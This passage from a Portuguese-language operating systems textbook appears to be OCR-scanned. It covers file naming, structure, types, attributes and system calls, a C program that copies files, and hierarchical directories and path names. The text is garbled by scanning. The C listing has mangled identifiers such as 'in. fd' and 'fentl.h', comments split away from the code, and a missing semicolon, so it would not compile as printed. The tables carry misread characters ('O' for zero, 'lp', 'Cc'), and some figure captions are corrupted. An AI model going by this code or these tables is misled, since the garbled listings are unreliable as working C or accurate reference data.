arquivos de linguagem de montagem. A extensão então 
se torna essencial para o compilador dizer quais são os 















































Extensão Significado 

bak Cópia de segurança 

Cc Código-fonte de programa em C 

gif Imagem no formato Graphical Interchange Format 
lp Arquivo de ajuda 

html Documento em HTML 

Jpg Imagem codificada segundo padrões JPEG 

mp3 Musica codificada no formato MPEG (camada 3) 
mpg Filme codificado no padrão MPEG 

0 Arquivo objeto (gerado por compilador, ainda não ligado) 
pdf Arquivo no formato PDF (Portable Document File) 
ps Arquivo PostScript 

tex Entrada para o programa de formatação TEX 

txt Arquivo de texto 

zip Arquivo compactado 
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arquivos C, os arquivos de linguagem de montagem e 
outros arquivos. 

Em contrapartida, o Windows é consciente das ex- 
tensões e designa significados a elas. Usuários (ou 
processos) podem registrar extensões com o sistema 
operacional e especificar para cada uma qual é seu “pro- 
prietário”. Quando um usuário clica duas vezes sobre o 
nome de um arquivo, o programa designado para essa 
extensão de arquivo é lançado com o arquivo como pa- 
râmetro. Por exemplo, clicar duas vezes sobre file.docx 
inicializará o Microsoft Word, tendo file.docx como seu 
arquivo inicial para edição. 


4.1.2 Estrutura de arquivos 


Arquivos podem ser estruturados de várias maneiras. 
Três possibilidades comuns estão descritas na Figura 
4.2. O arquivo na Figura 4.2(a) é uma sequência deses- 
truturada de bytes. Na realidade, o sistema operacional 
não sabe ou não se importa sobre o que há no arquivo. 
Tudo o que ele vê são bytes. Qualquer significado deve 
ser imposto por programas em nível de usuário. Tanto 
UNIX quanto Windows usam essa abordagem. 

Ter o sistema operacional tratando arquivos como 
nada mais que sequências de bytes oferece a máxima 
flexibilidade. Programas de usuários podem colocar 
qualquer coisa que eles quiserem em seus arquivos e 
nomeá-los do jeito que acharem conveniente. O sistema 
operacional não ajuda, mas também não interfere. Para 
usuários que querem realizar coisas incomuns, o segun- 
do ponto pode ser muito importante. Todas as versões 
do UNIX (incluindo Linux e OS X) e o Windows usam 
esse modelo de arquivos. 


O primeiro passo na estruturação está ilustrado na 
Figura 4.2(b). Nesse modelo, um arquivo é uma se- 
quência de registros de tamanho fixo, cada um com 
alguma estrutura interna. O fundamental para que um 
arquivo seja uma sequência de registros é a ideia de que 
a operação de leitura retorna um registro e a operação 
de escrita sobrepõe ou anexa um registro. Como nota 
histórica, décadas atrás, quando o cartão de 80 colunas 
perfurado era o astro, muitos sistemas operacionais de 
computadores de grande porte baseavam seus sistemas 
de arquivos em arquivos consistindo em registros de 80 
caracteres, na realidade, imagens de cartões. Esses sis- 
temas também aceitavam arquivos com registros de 132 
caracteres, destinados às impressoras de linha (que na- 
quela época eram grandes impressoras de corrente com 
132 colunas). Os programas liam a entrada em unidades 
de 80 caracteres e a escreviam em unidades de 132 ca- 
racteres, embora os últimos 52 pudessem ser espaços, 
é claro. Nenhum sistema de propósito geral atual usa 
mais esse modelo como seu sistema primário de arqui- 
vos, mas na época dos cartões perfurados de 80 colunas 
e impressoras de 132 caracteres por linha era um mode- 
lo comum em computadores de grande porte. 

O terceiro tipo de estrutura de arquivo é mostrado 
na Figura 4.2(c). Nessa organização, um arquivo con- 
siste em uma árvore de registros, não necessariamente 
todos do mesmo tamanho, cada um contendo um cam- 
po chave em uma posição fixa no registro. A árvore é 
ordenada no campo chave, a fim de permitir uma busca 
rápida por uma chave específica. 

A operação básica aqui não é obter o “próximo” re- 
gistro, embora isso também seja possível, mas aquele 
com a chave específica. Para o arquivo zoológico da 
Figura 4.2(c), você poderia pedir ao sistema para obter 


[FIGURA 4.2] Três tipos de arquivos. (a) Sequência de bytes. (b) Sequência de registros. (c) Árvore. 
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o registro cuja chave fosse pônei, por exemplo, sem 
se preocupar com sua posição exata no arquivo. Além 
disso, novos registros podem ser adicionados, com o 
sistema o operacional, e não o usuário, decidindo onde 
colocá-los. Esse tipo de arquivo é claramente bastante 
diferente das sequências de bytes desestruturadas usa- 
das no UNIX e Windows, e é usado em alguns com- 
putadores de grande porte para o processamento de 
dados comerciais. 


4.1.3 Tipos de arquivos 


Muitos sistemas operacionais aceitam vários tipos 
de arquivos. O UNIX (novamente, incluindo OS X) e o 
Windows, por exemplo, apresentam arquivos regulares 
e diretórios. O UNIX também tem arquivos especiais 
de caracteres e blocos. Arquivos regulares são aqueles 
que contêm informações do usuário. Todos os arquivos 
da Figura 4.2 são arquivos regulares. Diretórios são ar- 
quivos do sistema para manter a estrutura do sistema 
de arquivos. Estudaremos diretórios a seguir. Arquivos 
especiais de caracteres são relacionados com entrada/ 
saída e usados para modelar dispositivos de E/S seriais 
como terminais, impressoras e redes. Arquivos espe- 
ciais de blocos são usados para modelar discos. Neste 
capítulo, estaremos interessados fundamentalmente em 
arquivos regulares. 

Arquivos regulares geralmente são arquivos ASCII 
ou arquivos binários. Arquivos ASCII consistem de li- 
nhas de texto. Em alguns sistemas, cada linha termina 
com um caractere de retorno de carro (carriage return). 
Em outros, o caractere de próxima linha (line feed) 
é usado. Alguns sistemas (por exemplo, Windows) 
usam ambos. As linhas não precisam ser todas do mes- 
mo tamanho. 

A grande vantagem dos arquivos ASCII é que eles 
podem ser exibidos e impressos como são e editados 
com qualquer editor de texto. Além disso, se grandes 
números de programas usam arquivos ASCII para en- 
trada e saída, é fácil conectar a saída de um programa 
com a entrada de outro, como em pipelines do inter- 
pretador de comandos (shell). (O uso de pipelines en- 
tre processos não é nem um pouco mais fácil, mas a 
interpretação da informação certamente torna-se mais 
fácil se uma convenção padrão, como a ASCII, for usa- 
da para expressá-la.) 

Outros arquivos são binários, o que apenas signifi- 
ca que eles não são arquivos ASCII. Listá-los em uma 
impressora resultaria em algo completamente incom- 
preensível. Em geral, eles têm alguma estrutura interna 
conhecida pelos programas que os usam. 
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Por exemplo, na Figura 4.3(a) vemos um arquivo bi- 
nário executável simples tirado de uma versão inicial do 
UNIX. Embora tecnicamente o arquivo seja apenas uma 
sequência de bytes, o sistema operacional o executará 
somente se ele tiver o formato apropriado. Ele tem cin- 
co seções: cabeçalho, texto, dados, bits de realocação e 
tabela de símbolos. O cabeçalho começa com o chama- 
do número mágico, identificando o arquivo como exe- 
cutável (para evitar a execução acidental de um arquivo 
que não esteja em seu formato). Então vêm os tamanhos 
das várias partes do arquivo, o endereço no qual a exe- 
cução começa e alguns bits de sinalização. Após o ca- 
beçalho, estão o texto e os dados do próprio programa, 
que são carregados para a memória e realocados usando 
os bits de realocação. A tabela de símbolos é usada para 
correção de erros. 

Nosso segundo exemplo de um arquivo binário é 
um repositório (archive), também do UNIX. Ele con- 
siste em uma série de rotinas de biblioteca (módulos) 
compiladas, mas não ligadas. Cada uma é prefaciada 
por um cabeçalho dizendo seu nome, data de criação, 
proprietário, código de proteção e tamanho. Da mesma 
forma que o arquivo executável, os cabeçalhos de mó- 
dulos estão cheios de números binários. Copiá-los para 
a impressora produziria puro lixo. 

Todo sistema operacional deve reconhecer pelo 
menos um tipo de arquivo: o seu próprio arquivo exe- 
cutável; alguns reconhecem mais. O velho sistema 
TOPS-20 (para o DECSystem 20) chegou ao ponto 
de examinar data e horário de criação de qualquer 
arquivo a ser executado. Então ele localizava o arqui- 
vo-fonte e via se a fonte havia sido modificada desde 
a criação do binário. Em caso positivo, ele automa- 
ticamente recompilava a fonte. Em termos de UNIX, 
o programa make havia sido embutido no shell. As 
extensões de arquivos eram obrigatórias, então ele 
poderia dizer qual programa binário era derivado de 
qual fonte. 

Ter arquivos fortemente tipificados como esse cau- 
sa problemas sempre que o usuário fizer algo que os 
projetistas do sistema não esperavam. Considere, como 
um exemplo, um sistema no qual os arquivos de saída 
do programa têm a extensão .dat (arquivos de dados). 
Se um usuário escrever um formatador de programa 
que lê um arquivo .c (programa C), o transformar (por 
exemplo, convertendo-o em um layout padrão de inden- 
tação), e então escrever o arquivo transformado como 
um arquivo de saída, ele será do tipo .dat. Se o usuário 
tentar oferecer isso ao compilador C para compilá-lo, o 
sistema se recusará porque ele tem a extensão errada. 
Tentativas de copiar file.dat para file.c serão rejeitadas 
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[FIGURA 4.3] (a) Um arquivo executável. (0) Um repositório (archive). 
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pelo sistema como inválidas (a fim de proteger o usuá- 
rio contra erros). 

Embora esse tipo de “facilidade para o usuário” 
possa ajudar os novatos, é um estorvo para os usuários 
experientes, pois eles têm de devotar um esforço consi- 
derável para driblar a ideia do sistema operacional do 
que seja razoável ou não. 


4.1.4 Acesso aos arquivos 


Os primeiros sistemas operacionais forneciam ape- 
nas um tipo de acesso aos arquivos: acesso sequencial. 
Nesses sistemas, um processo podia ler todos os bytes 
ou registros em um arquivo em ordem, começando do 
princípio, mas não podia pular nenhum ou lê-los fora 
de ordem. No entanto, arquivos sequenciais podiam ser 
trazidos de volta para o ponto de partida, então eles po- 
diam ser lidos tantas vezes quanto necessário. Arquivos 
sequenciais eram convenientes quando o meio de arma- 
zenamento era uma fita magnética, em vez de um disco. 

Quando os discos passaram a ser usados para ar- 
mazenar arquivos, tornou-se possível ler os bytes ou 
registros de um arquivo fora de ordem, ou acessar os 
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registros pela chave em vez de pela posição. Arquivos 
ou registros que podem ser lidos em qualquer ordem são 
chamados de arquivos de acesso aleatório. Eles são 
necessários para muitas aplicações. 

Arquivos de acesso aleatório são essenciais para mui- 
tas aplicações, por exemplo, sistemas de bancos de da- 
dos. Se um cliente de uma companhia aérea liga e quer 
reservar um assento em um determinado voo, o progra- 
ma de reservas deve ser capaz de acessar o registro para 
aquele voo sem ter de ler primeiro os registros para mi- 
lhares de outros voos. 

Dois métodos podem ser usados para especificar 
onde começar a leitura. No primeiro, cada operação read 
fornece a posição no arquivo onde começar a leitura. No 
segundo, uma operação simples, seek, é fornecida para 
estabelecer a posição atual. Após um seek, o arquivo 
pode ser lido sequencialmente da posição agora atual. O 
segundo método é usado no UNIX e no Windows. 


4.1.5 Atributos de arquivos 


Todo arquivo possui um nome e sua data. Além 
disso, todos os sistemas operacionais associam outras 


informações com cada arquivo, por exemplo, a data e 
o horário em que foi modificado pela última vez, assim 
como o tamanho do arquivo. Chamaremos esses itens 
extras de atributos do arquivo. Algumas pessoas os 
chamam de metadados. A lista de atributos varia bas- 
tante de um sistema para outro. A tabela da Figura 4.4 
mostra algumas das possibilidades, mas existem outras. 
Nenhum sistema existente tem todos esses atributos, 
mas cada um está presente em algum sistema. 

Os primeiros quatro atributos concernem à proteção 
do arquivo e dizem quem pode acessá-lo e quem não 
pode. Todos os tipos de esquemas são possíveis, alguns 
dos quais estudaremos mais tarde. Em alguns sistemas 
o usuário deve apresentar uma senha para acessar um 
arquivo, caso em que a senha deve ser um dos atributos. 

As sinalizações (flags) são bits ou campos curtos que 
controlam ou habilitam alguma propriedade específica. 
Arquivos ocultos, por exemplo, não aparecem nas lis- 
tagens de todos os arquivos. A sinalização de arquiva- 
mento é um bit que controla se foi feito um backup do 
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arquivo recentemente. O programa de backup remove 
esse bit e o sistema operacional o recoloca sempre que 
um arquivo for modificado. Dessa maneira, o progra- 
ma consegue dizer quais arquivos precisam de backup. 
A sinalização temporária permite que um arquivo seja 
marcado para ser deletado automaticamente quando o 
processo que o criou for concluído. 

O tamanho do registro, posição da chave e tamanho dos 
campos-chave estão presentes apenas em arquivos cujos 
registros podem ser lidos usando uma chave. Eles propor- 
cionam a informação necessária para encontrar as chaves. 

Os vários registros de tempo controlam quando o 
arquivo foi criado, acessado e modificado pela última 
vez, os quais são úteis para uma série de finalidades. 
Por exemplo, um arquivo-fonte que foi modificado após 
a criação do arquivo-objeto correspondente precisa ser 
recompilado. Esses campos fornecem as informações 
necessárias. 

O tamanho atual nos informa o tamanho que o ar- 
quivo tem no momento. Alguns sistemas operacionais 






































Atributo Significado 
Proteção Quem tem acesso ao arquivo e de que modo 
Senha Necessidade de senha para acesso ao arquivo 
Criador ID do criador do arquivo 
Proprietário Proprietário atual 
Flag de somente leitura O para leitura/escrita; 1 para somente leitura 
Flag de oculto O para normal; 1 para não exibir o arquivo 
Flag de sistema O para arquivos normais; 1 para arquivos de sistema 
Flag de arquivamento O para arquivos com backup; 1 para arquivos sem backup 
Flag de ASCIl/binario O para arquivos ASCII; 1 para arquivos binários 
Flag de acesso aleatório O para acesso somente sequencial; 1 para acesso aleatório 
Flag de temporário O para normal; 1 para apagar o arquivo ao sair do processo 
Flag de travamento O para destravados; diferente de O para travados 
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de antigos computadores de grande porte exigiam que 
o tamanho máximo fosse especificado quando o arqui- 
vo fosse criado, a fim de deixar que o sistema ope- 
racional reservasse a quantidade máxima de memória 
antecipadamente. Sistemas operacionais de computa- 
dores pessoais e de estações de trabalho são inteligen- 
tes o suficiente para não precisarem desse atributo. 


4.1.6 Operações com arquivos 


Arquivos existem para armazenar informações e 
permitir que elas sejam recuperadas depois. Sistemas 
diferentes proporcionam operações diferentes para per- 
mitir armazenamento e recuperação. A seguir uma dis- 
cussão das chamadas de sistema mais comuns relativas 
a arquivos. 


1. Create. O arquivo é criado sem dados. A finalida- 
de dessa chamada é anunciar que o arquivo está 
vindo e estabelecer alguns dos atributos. 

2. Delete. Quando o arquivo não é mais necessário, 
ele tem de ser removido para liberar espaço para 
o disco. Há sempre uma chamada de sistema para 
essa finalidade. 

3. Open. Antes de usar um arquivo, um processo 
precisa abri-lo. A finalidade da chamada open é 
permitir que o sistema busque os atributos e lista 
de endereços do disco para a memória principal 
a fim de tornar mais rápido o acesso em chama- 
das posteriores. 

4. Close. Quando todos os acessos são concluídos, 
os atributos e endereços de disco não são mais 
necessários, então o arquivo deve ser fechado 
para liberar espaço da tabela interna. Muitos sis- 
temas encorajam isso impondo um número máxi- 
mo de arquivos abertos em processos. Um disco é 
escrito em blocos, e o fechamento de um arquivo 
força a escrita do último bloco dele, mesmo que 
não esteja inteiramente cheio ainda. 

5. Read. Dados são lidos do arquivo. Em geral, 
os bytes vêm da posição atual. Quem fez a cha- 
mada deve especificar a quantidade de dados 
necessária e também fornecer um buffer para 
colocá-los. 

6. Write. Dados são escritos para o arquivo de novo, 
normalmente na posição atual. Se a posição atual 
for o final do arquivo, seu tamanho aumentará. 
Se estiver no meio do arquivo, os dados existen- 
tes serão sobrescritos e perdidos para sempre. 


7. Append. Essa chamada é uma forma restrita de 
write. Ela pode acrescentar dados somente para o 
final do arquivo. Sistemas que fornecem um con- 
junto mínimo de chamadas do sistema raramente 
têm append, mas muitos sistemas fornecem múl- 
tiplas maneiras de fazer a mesma coisa, e esses às 
vezes têm append. 

8. Seek. Para arquivos de acesso aleatório, é neces- 
sário um método para especificar de onde tirar os 
dados. Uma abordagem comum é uma chamada 
de sistema, seek, que reposiciona o ponteiro de 
arquivo para um local específico dele. Após essa 
chamada ter sido completa, os dados podem ser 
lidos da, ou escritos para, aquela posição. 

9. Get attributes. Processos muitas vezes preci- 
sam ler atributos de arquivos para realizar seu 
trabalho. Por exemplo, o programa make da 
UNIX costuma ser usado para gerenciar pro- 
jetos de desenvolvimento de software consis- 
tindo de muitos arquivos-fonte. Quando make 
é chamado, ele examina os momentos de al- 
teração de todos os arquivos-fonte e objetos 
e organiza o número mínimo de compilações 
necessárias para atualizar tudo. Para realizar o 
trabalho, o make deve examinar os atributos, a 
saber, os momentos de alteração. 

10.Set attributes. Alguns dos atributos podem ser 
alterados pelo usuário e modificados após o ar- 
quivo ter sido criado. Essa chamada de sistema 
torna isso possível. A informação sobre o modo 
de proteção é um exemplo óbvio. A maioria das 
sinalizações também cai nessa categoria. 

11.Rename. Acontece com frequência de um usuá- 
rio precisar mudar o nome de um arquivo. Essa 
chamada de sistema torna isso possível. Ela 
nem sempre é estritamente necessária, porque 
o arquivo em geral pode ser copiado para um 
outro com um nome novo, e o arquivo antigo é 
então deletado. 


4.1.7 Exemplo de um programa usando chamadas 
de sistema para arquivos 


Nesta seção examinaremos um programa UNIX sim- 
ples que copia um arquivo do seu arquivo-fonte para um 
de destino. Ele está listado na Figura 4.5. O programa 
tem uma funcionalidade mínima e um mecanismo para 
reportar erros ainda pior, mas proporciona uma ideia ra- 
zoável de como algumas das chamadas de sistema rela- 
cionadas a arquivos funcionam. 


Ke Um programa simples para copiar um arquivo. 
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/* Programa que copia arquivos. Verificacao e relato de erros e minimo. */ 


#include <sys/types.h> 
#include <fentl.h> 
#include <stdlib.h> 
#include <unistd.h> 


int main(int argc, char *argv[]); 


#define BUF_SIZE 4096 
#define OUTPUT __MODE 0700 


int main(int argc, char *argv[]) 


/* inclui os arquivos de cabecalho necessarios */ 


/* prototipo ANS */ 


/* usa um tamanho de buffer de 4096 bytes */ 
/* bits de protecao para o arquivo de saida */ 


/* erro de sintaxe se argc nao for 3 */ 
/* abre o arquivo de origem */ 
/* se nao puder ser aberto, saia */ 


/* se nao puder ser criado, saia */ 


/* se fim de arquivo ou erro, sai do laco*/ 


/* wt. count <= 0 e um erro */ 


/* nenhum erro na ultima leitura */ 


/* erro na ultima leitura */ 


{ 

int in_fd, out_fd, rd_count, wt_count; 

char buffer[BUF _SIZE]; 

if (argc != 3) exit(1); 

/* Abre o arquivo de entrada e cria o arquivo de saida*/ 

in. fd = open(argv[1], O. RDONLY); 

if (in fd< 0) exit(2); 

out. fd = creat(argv[2], OUTPUT. MODE); /* cria o arquivo de destino */ 

if (out fd<0) exit(3); 

/* Laco de copia */ 

while (TRUE) { 
rd count = read(in fd, buffer, BUF _SIZE); /* le um bloco de dados */ 
if (rd_count <= 0) break 
wt_count = write(out. fd, buffer, rd. count); /* escreve dados */ 
if (wt. count <= 0) exit(4); 

} 

/* Fecha os arquivos*/ 

close(in _fd); 

close(out_fd); 

if (rd count == 0) 
exit(0); 

else 
exit(5); 

} 


O programa, copyfile, pode ser chamado, por exem- 
plo, pela linha de comando 


copyfile abc xyz 


para copiar o arquivo abc para xyz. Se xyz já existir, ele 
será sobrescrito. De outra maneira, ele será criado. O 
programa precisa ser chamado com exatamente dois ar- 
gumentos, ambos nomes legais de arquivos. O primeiro 
é o fonte; o segundo é o arquivo de saída. 

Os quatro comandos include próximos do início do 
programa fazem que um grande número de definições 
e protótipos de funções sejam incluídos no programa. 
Essas inclusões são necessárias para deixá-lo em con- 
formidade com os padrões internacionais relevantes, 


mas não nos ocuparemos mais com elas. A linha se- 
guinte é um protótipo da função para main, algo exigido 
pelo ANSI C, mas também não relevante para nossas 
finalidades. 

O primeiro comando #define é uma definição macro, 
que estabelece a sequência de caracteres BUF SIZE 
como uma macro que se expande no número 4096. O 
programa lerá e escreverá em pedaços de 4096 bytes. 
É considerada uma boa prática de programação dar no- 
mes a constantes como essa e usá-los em vez das cons- 
tantes. Não apenas essa convenção torna os programas 
mais fáceis de ler, mas também de manter. O segundo 
comando #define determina quem pode acessar o arqui- 
vo de saída. 
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O programa principal é chamado main e tem dois 
argumentos: argc e argv. Estes são oferecidos pelo sis- 
tema operacional quando o programa é chamado. O pri- 
meiro diz quantas sequências estão presentes na linha 
de comando que invocou o programa, incluindo o nome 
dele. Deveriam ser 3. O segundo é um arranjo de pontei- 
ros para os argumentos. Na chamada de exemplo dada, 
os elementos desse arranjo conteriam ponteiros para os 
seguintes valores: 


argv[0] = “copyfile” 
argv[1] = “abc” 
argv[2] = “xyz” 


É por meio desse arranjo que o programa acessa os 
seus argumentos. 

Cinco variáveis são declaradas. As duas primeiras, 
in fdeout fd, conterão os descritores de arquivos, va- 
lores inteiros pequenos retornados quando um arquivo 
é aberto. As outras duas, rd count e wt count, são as 
contagens de bytes retornadas pelas chamadas de sis- 
tema read e write, respectivamente. A última, buffer, é 
um buffer usado para conter os dados lidos e fornecer os 
dados para serem escritos. 

O primeiro comando real confere argc para ver se 
ele é 3. Se não for, o programa terminará com um códi- 
go de estado 1. Qualquer código de estado diferente de 
O significa que ocorreu um erro. O código de estado é o 
único meio de reportar erros presente nesse programa. 
Uma versão comercial normalmente imprimiria mensa- 
gens de erros também. 

Então tentamos abrir o arquivo-fonte e criar o arquivo- 
-destino. Se o arquivo-fonte for aberto de maneira bem- 
-sucedida, o sistema designa um pequeno inteiro para 
in fd, a fim de identificá-lo. Chamadas subsequentes de- 
vem incluir esse inteiro de maneira que o sistema saiba 
qual arquivo ele quer. Similarmente, se o destino for cria- 
do de maneira bem-sucedida, out fd recebe um valor para 
identificá-lo. O segundo argumento para creat estabelece 
o modo de proteção. Se a abertura ou a criação falhar, o 
descritor do arquivo correspondente será definido como 
—1, e o programa terminará com um código de erro. 

Agora entra em cena o laço da cópia. Esse laço come- 
ça tentando ler 4 KB de dados para o buffer. Ele faz isso 
chamando a rotina de biblioteca read, que na realidade 
invoca a chamada de sistema read. O primeiro parâmetro 
identifica o arquivo, o segundo dá o buffer e o terceiro diz 
quantos bytes devem ser lidos. O valor designado para 
rd count dá o número de bytes que foram realmente li- 
dos. Em geral, esse valor será de 4096, exceto se menos 
bytes estiverem restando no arquivo. Quando o final do 


arquivo tiver sido alcançado, ele será 0. Se o rd count 
chegar a 0 ou um valor negativo, a cópia não poderá con- 
tinuar, de maneira que o comando break é executado para 
terminar o laço (de outra maneira interminável). 

A chamada write descarrega o buffer para o arquivo 
de destino. O primeiro parâmetro identifica o arquivo, o 
segundo dá o buffer e o terceiro diz quantos bytes escre- 
ver, análogo a read. Observe que a contagem de bytes 
é o número de bytes realmente lidos, não BUF SIZE. 
Esse ponto é importante porque o último read não re- 
tornará 4096 a não ser que o arquivo coincidentemente 
seja um múltiplo de 4 KB. 

Quando o arquivo inteiro tiver sido processado, a 
primeira chamada além do fim do arquivo retornará a 0 
para 7d count, que a fará deixar o laço. Nesse ponto, os 
dois arquivos estão próximos e o programa sai com um 
estado indicando uma conclusão normal. 

Embora chamadas do sistema Windows sejam dife- 
rentes daquelas do UNIX, a estrutura geral de um pro- 
grama ativado pela linha de comando no Windows para 
copiar um arquivo é moderadamente similar àquele da 
Figura 4.5. Examinaremos as chamadas do Windows 8 
no Capítulo 11. 


4.2 Diretórios 


Para controlar os arquivos, sistemas de arquivos 
normalmente têm diretórios ou pastas, que são em si 
arquivos. Nesta seção discutiremos diretórios, sua orga- 
nização, suas propriedades e as operações que podem 
ser realizadas por eles. 


4.2.1 Sistemas de diretório em nível único 


A forma mais simples de um sistema de diretó- 
rio é ter um diretório contendo todos os arquivos. Às 
vezes ele é chamado de diretório-raiz, mas como ele 
é o único, o nome não importa muito. Nos primeiros 
computadores pessoais, esse sistema era comum, em 
parte porque havia apenas um usuário. Curiosamente, 
o primeiro supercomputador do mundo, o CDC 6600, 
também tinha apenas um único diretório para todos os 
arquivos, embora fosse usado por muitos usuários ao 
mesmo tempo. Essa decisão foi tomada sem dúvida 
para manter simples o design do software. 

Um exemplo de um sistema com um diretório é dado 
na Figura 4.6. Aqui o diretório contém quatro arquivos. 
As vantagens desse esquema são a sua simplicidade e a 
capacidade de localizar arquivos rapidamente — há ape- 
nas um lugar para se procurar, afinal. Às vezes ele ainda 


gelT ERJ Um sistema de diretório em nível único contendo 
quatro arquivos. 
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é usado em dispositivos embarcados simples como câ- 
meras digitais e alguns players portáteis de música. 


4.2.2 Sistemas de diretórios hierárquicos 


O nível único é adequado para aplicações dedicadas 
muito simples (e chegou a ser usado nos primeiros com- 
putadores pessoais), mas para os usuários modernos 
com milhares de arquivos seria impossível encontrar 
qualquer coisa se todos os arquivos estivessem em um 
único diretório. 

Em consequência, é necessária uma maneira para 
agrupar arquivos relacionados em um mesmo local. Um 
professor, por exemplo, pode ter uma coleção de arqui- 
vos que juntos formam um livro que ele está escrevendo, 
uma segunda coleção contendo programas apresentados 
por estudantes para outro curso, um terceiro grupo con- 
tendo o código de um sistema de escrita de compiladores 
avançado que ele está desenvolvendo, um quarto grupo 
contendo propostas de doações, assim como outros ar- 
quivos para correio eletrônico, minutas de reuniões, es- 
tudos que ele está escrevendo, jogos e assim por diante. 

Faz-se necessária uma hierarquia (isto é, uma árvore 
de diretórios). Com essa abordagem, o usuário pode ter 
tantos diretórios quantos forem necessários para agrupar 
seus arquivos de maneira natural. Além disso, se múl- 
tiplos usuários compartilham um servidor de arquivos 
comum, como é o caso em muitas redes de empresas, 
cada usuário pode ter um diretório-raiz privado para sua 
própria hierarquia. Essa abordagem é mostrada na Figura 
4.7. Aqui, cada diretório A, B e C contido no diretório- 
-raiz pertence a um usuário diferente, e dois deles criaram 
subdiretórios para projetos nos quais estão trabalhando. 

A capacidade dos usuários de criarem um número 
arbitrário de subdiretórios proporciona uma ferramenta 
de estruturação poderosa para eles organizarem o seu 
trabalho. Por essa razão, quase todos os sistemas de ar- 
quivos modernos são organizados dessa maneira. 


4.2.3 Nomes de caminhos 


Quando o sistema de arquivos é organizado 
com uma árvore de diretórios, alguma maneira é 
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necessária para especificar os nomes dos arquivos. 
Dois métodos diferentes são os mais usados. No pri- 
meiro, cada arquivo recebe um nome de caminho 
absoluto consistindo no caminho do diretório-raiz 
para o arquivo. Como exemplo, o caminho /usr/ast/ 
caixapostal significa que o diretório-raiz contém um 
subdiretório usr, que por sua vez contém um subdire- 
tório ast, que contém o arquivo caixapostal. Nomes 
de caminhos absolutos sempre começam no diretó- 
rio-raiz e são únicos. No UNIX, os componentes do 
caminho são separados por /. No Windows o separa- 
dor é \. No MULTICS era >. Desse modo, o mesmo 
nome de caminho seria escrito como a seguir nesses 
três sistemas: 


Windows | \usr\ast\caixapostal 
UNIX /usr/ast/caixapostal 
MULTICS >usr>ast>caixapostal 


Não importa qual caractere é usado, se o primeiro 
caractere do nome do caminho for o separador, então o 
caminho será absoluto. 

O outro tipo é o nome de caminho relativo. Esse 
é usado em conjunção com o conceito do diretório de 
trabalho (também chamado de diretório atual). Um 
usuário pode designar um diretório como o de trabalho 
atual, caso em que todos os nomes de caminho não co- 
meçando no diretório-raiz são presumidos como relati- 
vos ao diretório de trabalho. Por exemplo, se o diretório 
de trabalho atual é /usr/ast, então o arquivo cujo cami- 
nho absoluto é /usr/ast/caixapostal pode ser referencia- 
do somente como caixa postal. Em outras palavras, o 
comando UNIX 


cp /usr/ast/caixapostal /usr/ast/caixapostal.bak 
e o comando 


cp caixapostal caixapostal.bak 
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realizam exatamente a mesma coisa se o diretório de tra- 
balho for /usr/ast. A forma relativa é muitas vezes mais 
conveniente, mas ela faz o mesmo que a forma absoluta. 

Alguns programas precisam acessar um arquivo es- 
pecífico sem se preocupar em saber qual é o diretório de 
trabalho. Nesse caso, eles devem usar sempre os nomes 
de caminhos absolutos. Por exemplo, um verificador 
ortográfico talvez precise ler /usr/lib/dictionary para re- 
alizar esse trabalho. Nesse caso ele deve usar o nome de 
caminho absoluto completo, pois não sabe em qual dire- 
tório de trabalho estará quando for chamado. O nome de 
caminho absoluto sempre funcionará, não importa qual 
seja o diretório de trabalho. 

É claro, se o verificador ortográfico precisar de um 
número grande de arquivos de /usr/lib, uma abordagem 
alternativa é ele emitir uma chamada de sistema para mu- 
dar o seu diretório de trabalho para /usr/lib e então usar 
apenas dictionary como o primeiro parâmetro para open. 
Ao mudar explicitamente o diretório de trabalho, o veri- 
ficador sabe com certeza onde ele se situa na árvore de 
diretórios, assim pode então usar caminhos relativos. 

Cada processo tem seu próprio diretório de traba- 
lho, então quando ele o muda e mais tarde sai, nenhum 
outro processo é afetado e nenhum traço da mudança 
é deixado para trás no sistema de arquivos. Dessa ma- 
neira, é sempre perfeitamente seguro para um processo 
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mudar seu diretório de trabalho sempre que ele achar 
conveniente. Por outro lado, se uma rotina de bibliote- 
ca muda o diretório de trabalho e não volta para onde 
estava quando termina, o resto do programa pode não 
funcionar, pois sua suposição sobre onde está pode tor- 
nar-se subitamente inválida. Por essa razão, rotinas de 
biblioteca raramente alteram o diretório de trabalho e, 
quando precisam fazê-lo, elas sempre o alteram de volta 
antes de retornar. 

A maioria dos sistemas operacionais que aceita um 
sistema de diretório hierárquico tem duas entradas es- 
peciais em cada diretório, “.” e “..”, geralmente pronun- 
ciadas como “ponto” e “pontoponto”. Ponto refere-se 
ao diretório atual; pontoponto refere-se ao pai (exceto 
no diretório-raiz, onde ele refere-se a si mesmo). Para 
ver como essas entradas são usadas, considere a árvo- 
re de diretórios UNIX da Figura 4.8. Um determinado 
processo tem /usr/ast como seu diretório de trabalho. 
Ele pode usar .. para subir na árvore. Por exemplo, pode 
copiar o arquivo /usr/lib/dictionary para o seu próprio 
diretório usando o comando 


cp ../lib/dictionary . 


O primeiro caminho instrui o sistema a subir (para 
o diretório usr), então a descer para o diretório lib para 
encontrar o arquivo dictionary. 


Diretório-raiz 


tmp 


—<— [usr/jim 


O segundo argumento (ponto) refere-se ao diretório 
atual. Quando o comando cp recebe um nome de dire- 
tório (incluindo ponto) como seu último argumento, ele 
copia todos os arquivos para aquele diretório. É claro, 
uma maneira mais natural de realizar a cópia seria usar o 
nome de caminho absoluto completo do arquivo-fonte: 


cp /usr/lib/dictionary . 


Aqui o uso do ponto poupa o usuário do desperdício 
de tempo de digitar dictionary uma segunda vez. Mes- 
mo assim, digitar 


cp /usr/lib/dictionary dictionary 
também funciona bem, assim como 
cp /usr/lib/dictionary /usr/ast/dictionary 


Todos esses comandos realizam exatamente a mes- 
ma coisa. 


4.2.4 Operações com diretórios 


As chamadas de sistema que podem gerenciar dire- 
tórios exibem mais variação de sistema para sistema do 
que as chamadas para gerenciar arquivos. Para dar uma 
impressão do que elas são e como funcionam, daremos 
uma amostra (tirada do UNIX). 


1. Create. Um diretório é criado. Ele está vazio ex- 
ceto por ponto e pontoponto, que são colocados 
ali automaticamente pelo sistema (ou em alguns 
poucos casos, pelo programa mkdir). 

2. Delete. Um diretório é removido. Apenas um 
diretório vazio pode ser removido. Um diretó- 
rio contendo apenas ponto e pontoponto é con- 
siderado vazio à medida que eles não podem ser 
removidos. 

3. Opendir. Diretórios podem ser lidos. Por exem- 
plo, para listar todos os arquivos em um diretório, 
um programa de listagem abre o diretório para ler 
os nomes de todos os arquivos que ele contém. 
Antes que um diretório possa ser lido, ele deve 
ser aberto, de maneira análoga a abrir e ler um 
arquivo. 

